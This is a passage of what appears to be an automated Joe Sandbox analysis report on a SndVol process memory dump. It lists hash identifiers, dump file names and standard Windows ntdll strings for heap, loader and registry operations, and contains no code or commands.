                                                                                                                                                  • Opcode ID: 15a1443ebbd14e909a26f1bc662f91422a0e11c3b550ff7b7a2ad8fed93191be
                                                                                                                                                  • Instruction ID: 93df521a638f8840ca6a4fc70835004423159e7a3a08d84910a97e33f1674a0d
                                                                                                                                                  • Opcode Fuzzy Hash: 15a1443ebbd14e909a26f1bc662f91422a0e11c3b550ff7b7a2ad8fed93191be
                                                                                                                                                  • Instruction Fuzzy Hash: 9F623976A003299FEB21CF55CC40BD9B7B8BB4B354F4445EAE409A7A50DB319E84CF92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\UV6
                                                                                                                                                  • API String ID: 0-4128049041
                                                                                                                                                  • Opcode ID: b16079aaf58e01441af6fce93892e4d1dea35c2b4c6f2079dcd918d509985dff
                                                                                                                                                  • Instruction ID: 91ed080fd4004ead5e18bd5acb982ff5acfed9e64383c91cce5dacf1e9912bca
                                                                                                                                                  • Opcode Fuzzy Hash: b16079aaf58e01441af6fce93892e4d1dea35c2b4c6f2079dcd918d509985dff
                                                                                                                                                  • Instruction Fuzzy Hash: EEB1BC76E25754DBFB15CF66C880B9EB3B6AF94794F244939E850EB280D735E840CB80
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\UV6${
                                                                                                                                                  • API String ID: 0-3904934332
                                                                                                                                                  • Opcode ID: 1e0adb26170bd5a5fcf0500e5dd2aa30ae8365704be67902f6af83eb7955b926
                                                                                                                                                  • Instruction ID: a2c97062c5c5077f595a30b25c1269b04ebd0d0e427d788dc079ac3ec50e4f1f
                                                                                                                                                  • Opcode Fuzzy Hash: 1e0adb26170bd5a5fcf0500e5dd2aa30ae8365704be67902f6af83eb7955b926
                                                                                                                                                  • Instruction Fuzzy Hash: A991AAB5E15359CBFB21CF55C840BEE77F0AF11368F6045A9E810AB290D779AA80CF90
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                  • API String ID: 2994545307-2586055223
                                                                                                                                                  • Opcode ID: f443bed9bcc4fa50359b610d05f0c402cced0e377dbc70ab1547fb9c094942b7
                                                                                                                                                  • Instruction ID: c1abb0668b7d67f1e8b7e7437c5727c9cb1da0ea87846d6911e6ce928053c95a
                                                                                                                                                  • Opcode Fuzzy Hash: f443bed9bcc4fa50359b610d05f0c402cced0e377dbc70ab1547fb9c094942b7
                                                                                                                                                  • Instruction Fuzzy Hash: CB611172254380AFE712CF65CC44FAAB7E8EF84794F140979E994CB691DB34D801CBA2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                  • Opcode ID: 7ebd53321c97ec75ec17304030724c1cf7b40b2a607c375f630b873043a15803
                                                                                                                                                  • Instruction ID: 284e07fcec5b34c994b0edc660bd73a761b3469e4a1981c1748609ef81961614
                                                                                                                                                  • Opcode Fuzzy Hash: 7ebd53321c97ec75ec17304030724c1cf7b40b2a607c375f630b873043a15803
                                                                                                                                                  • Instruction Fuzzy Hash: 64318136A01218EFDB01CF5ACC84F9AB7BDEF85764F5440B5E814A76A0DB34D940CE61
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: @$BuildLabEx$E\6$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 0-1655721667
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
• API String ID: 0-3178619729
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: $ $0
• API String ID: 0-3352262554
Strings
• HEAP[%wZ]: , xrefs: 36591712
• HEAP: , xrefs: 36591596
• HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36591728
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
• API String ID: 0-3178619729
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: @$DelegatedNtdll$\SystemRoot\system32\
• API String ID: 0-2391371766
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
• API String ID: 0-318774311
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: Objects=%4u$Objects>%4u$VirtualAlloc
• API String ID: 0-3870751728
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: %$&$@
• API String ID: 0-1537733988
Strings
• GlobalizationUserSettings, xrefs: 3666B834
• TargetNtPath, xrefs: 3666B82F
• \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3666B82A
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
• API String ID: 0-505981995
Strings
• HEAP[%wZ]: , xrefs: 365EE6A6
• HEAP: , xrefs: 365EE6B3
• RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 365EE6C6
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                  • API String ID: 0-1340214556
                                                                                                                                                  • Opcode ID: a4b463940544f64274d152bf11e102bd8bab9be022740655815c4d77c4d219a2
                                                                                                                                                  • Instruction ID: d79e83ae607b4763b432d03245d3c1b43275f9083aeb86bd9c6db4f42fb7a79e
                                                                                                                                                  • Opcode Fuzzy Hash: a4b463940544f64274d152bf11e102bd8bab9be022740655815c4d77c4d219a2
                                                                                                                                                  • Instruction Fuzzy Hash: E251E075B50784EFE712CBA5C884B9ABBF8AF49384F0404B5E580CBA92D734E940CF61
Strings
• Could not validate the crypto signature for DLL %wZ, xrefs: 365FA589
• minkernel\ntdll\ldrmap.c, xrefs: 365FA59A
• LdrpCompleteMapModule, xrefs: 365FA590
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
• API String ID: 0-1676968949
• Opcode ID: 9b361078395b9198f0b2f5208f15ef3a235529e59710dacc3ed09ebb7e7d6380
• Instruction ID: 7aa613f06121431a432aa7142bd36251e42daf9bc53b64183814c57a53265c3b
• Opcode Fuzzy Hash: 9b361078395b9198f0b2f5208f15ef3a235529e59710dacc3ed09ebb7e7d6380
• Instruction Fuzzy Hash: 6D510374A10745DBFB21CF69CD40B1A7BE4AF40B58F6406B5E9529BAE1DB74E800CB82
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
• API String ID: 0-1151232445
• Opcode ID: 70c3a8db9accbe8e21d4e2f5d732ecb86341c399290bc7c92d84316b691a12b2
• Instruction ID: 65cc8933c0b4205344d99134b839ecf0f6fc96c77d5a266b2bb671ade102ebcd
• Opcode Fuzzy Hash: 70c3a8db9accbe8e21d4e2f5d732ecb86341c399290bc7c92d84316b691a12b2
• Instruction Fuzzy Hash: 574135B8B003A08FFF15CF2AC4847A977E19F41388F6444F9D4558BA52DAB8D886CF51
Strings
• LdrpAllocateTls, xrefs: 36601B40
• TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36601B39
• minkernel\ntdll\ldrtls.c, xrefs: 36601B4A
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
• API String ID: 0-4274184382
• Opcode ID: 1e9383c243e28ecbde160048c6fd5e1b58e0fda964961da49b1aea46a0e73c1c
• Instruction ID: 628ce7d9b0be6d181c3a9a28b8b65b08869cd242cd518bebc67f9a7e988f3ba0
• Opcode Fuzzy Hash: 1e9383c243e28ecbde160048c6fd5e1b58e0fda964961da49b1aea46a0e73c1c
• Instruction Fuzzy Hash: CE4168B5E00619EFDB15CFA9CC40AAEBBF6FF98394F508129E405A7250DB35A811CF91
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
• API String ID: 2994545307-964947082
• Opcode ID: 0950412c6594ea35a9bd56f3e3c8d0a1284cbe4c51cd0e78f082fd218c5d933c
• Instruction ID: 1caa8cfe38f1e35b264c077493c52bdb4ff7bc314bb508dccce5ad19ea6c2ddd
• Opcode Fuzzy Hash: 0950412c6594ea35a9bd56f3e3c8d0a1284cbe4c51cd0e78f082fd218c5d933c
• Instruction Fuzzy Hash: EF41E2B1A0125DBFD702EFB5C890F6B3BAAEB443C4F50406AEA11AB240DE34C855CB56
Strings
• SXS: %s() passed the empty activation context data, xrefs: 366029FE
• Actx , xrefs: 365C33AC
• RtlCreateActivationContext, xrefs: 366029F9
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
• API String ID: 0-859632880
• Opcode ID: ef9c33abe7ce984e95eeb6c81cf721dc0e42acb5224c48ecd0bbbce5f5ee71d9
• Instruction ID: c5966d0b2e3103cff820baa458d302e420d4753ed15038e4bee7bd60444e04d1
• Opcode Fuzzy Hash: ef9c33abe7ce984e95eeb6c81cf721dc0e42acb5224c48ecd0bbbce5f5ee71d9
• Instruction Fuzzy Hash: 9C312072A00319AFEB16CFAAD8C4F8A37A8AF447A4F504479E8059F281DB35DC45CBD0
Strings
• \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3661B632
• @, xrefs: 3661B670
• GlobalFlag, xrefs: 3661B68F
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
• API String ID: 0-4192008846
• Opcode ID: ea3dad3ce4733e6b14083a91c0198dff8ab081dd98a7d3b2643801df27b59fe4
• Instruction ID: fa680875e7143f2498e27f1b341f314ba9c3d141a282a849b96882d1b8ea6019
• Opcode Fuzzy Hash: ea3dad3ce4733e6b14083a91c0198dff8ab081dd98a7d3b2643801df27b59fe4
• Instruction Fuzzy Hash: DB3139B5E0021DAEDB00DFA6DC80AEEBBB8EF44784F500469E605A6190D7749A04CBA5
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
• API String ID: 0-1050206962
• Opcode ID: 039ca4af80e1eb1365c86ab0d61fbe94aa17fbda2c0015facdc944a1711b602b
• Instruction ID: 5b212dfe1eb233f7889057f33e09c30b2236a7bd4d36218c079aa3acce1e5128
• Opcode Fuzzy Hash: 039ca4af80e1eb1365c86ab0d61fbe94aa17fbda2c0015facdc944a1711b602b
• Instruction Fuzzy Hash: 4F317C72D01219BFEB02CF95CC80EAEFBBDEB44798F814075EA00A7261D7349D048BA1
                                                                                                                                                  Strings
• LdrpInitializeTls, xrefs: 36601A47
• DLL "%wZ" has TLS information at %p, xrefs: 36601A40
• minkernel\ntdll\ldrtls.c, xrefs: 36601A51
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
• API String ID: 0-931879808
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: @$@
• API String ID: 0-149943524
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: $$$
• API String ID: 0-233714265
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
• API String ID: 0-118005554
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: .Local\$@
• API String ID: 0-380025441
Strings
• SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36602A95
• RtlpInitializeAssemblyStorageMap, xrefs: 36602A90
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
• API String ID: 0-2653619699
Strings
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID: @[h6@[h6
• API String ID: 0-1053330818
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 36663356
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID:
• API String ID: 4062629308-0
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                  Strings
                                                                                                                                                  • System Volume Information, xrefs: 3663DEBE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
